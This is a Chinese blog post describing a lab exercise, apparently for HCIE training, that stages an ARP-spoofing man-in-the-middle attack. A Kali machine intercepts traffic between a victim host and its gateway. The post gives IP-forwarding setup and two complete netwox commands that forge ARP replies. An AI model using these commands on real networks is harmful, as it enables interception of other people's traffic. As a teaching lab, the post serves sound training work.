HCIE(1)——ARP欺骗实验模拟

一、实验拓扑
在这里插入图片描述

二、实验要求
网关发送给主机A的消息会被攻击者接受,再转发给主机A;同理。主机A发送给网关的消息也会被攻击者接收,再转发给网关。相当于,攻击者B成为了主机A和网关C通信的**“中间者”**。

三、实验环境准备
kali-Linux虚拟机
ensp实验环境

四、实验步骤
1、配置相应的IP地址
受害者主机A:172.24.8.130/24
网关:172.24.8.2/24
攻击者kali:172.24.8.129/24
外网主机:10.1.1.100/24
2、首先测试一下各个设备之间的连通性
受害者主机A与攻击者kali之间:
在这里插入图片描述
受害者主机A与外网主机B之间:
在这里插入图片描述
3、使用arp -a查看一下受害者A上和路由器上的的arp缓存列表
在这里插入图片描述
在这里插入图片描述

4、在kali上进行攻击
1)开启网卡转发功能
vim /etc/sysctl.conf //编辑sysctl.conf
Net.ipv4.ip_forward = 1 //设置为1
Sysctl -p /etc/sysctl.conf //立即生效不需要重启
Cat /etc/sys/net/ipv4/ipv4_forward //查看值是否为1,为1表示修改完成,为0表示没有修改。
开启了网卡转发功能后,受害者主机发送到目标主机的数据包会经过攻击者转发出去,这样攻击者就可以监听他们之间的数据了。
同时还需要在kali上写一条到10.1.1.100的静态路由,保证kali可以到外网

sudo route add -net 10.1.1.0 netmask 255.255.255.0 gw 172.24.8.2 

2)使用netwox 33 号工具,对主机A收到的网关的ARPREP报文修改;

sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 54:89:98:08:60:D4 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.2 -h 54:89:98:08:60:D4 -i 172.24.8.130
sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 00:e0:fc:66:4a:b3 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.130 -h 00:e0:fc:66:4a:b3 -i 172.24.8.2

在这里插入图片描述
在这里插入图片描述

3)查看受害者主机A的ARP缓存列表,可以看到网关的MAC地址已经变成了攻击者的MAC
在这里插入图片描述
查看路由器上缓存列表
在这里插入图片描述
5、进行抓包测试
可以在攻击者kali上面的Eth0上抓包。
在这里插入图片描述
可以观察到他们之间的通信数据会经过攻击者。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值